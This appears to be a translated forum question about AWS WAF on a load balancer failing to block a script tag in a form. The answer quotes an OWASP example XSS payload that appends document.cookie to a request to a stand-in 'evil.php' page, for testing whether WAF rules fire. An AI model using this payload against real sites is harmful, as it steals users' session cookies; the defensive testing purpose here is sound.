我尝试提交表单,<script>danger</script>但并未被阻止。我将 WAF 放在我的 ELB 上并进行了测试,以确保我有分析功能(如下)。
我究竟做错了什么?
这是我的 ACL:
这是我的 XSS 和 SQL 规则:
分析:(为了表明流量确实通过 LB 路由)
答案1
下面是一个如何触发 XSS 规则的示例。这应该会自行触发您的规则(您可以通过将其指向您自己的 PHP 页面或其他 Web 位置来证明这一点),但这至少演示了一般原则。
<script type="text/javascript">
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
document.write("<img src='" + adr + "' />");
</script>
以下 OWASP 文章提供了此示例和其他示例: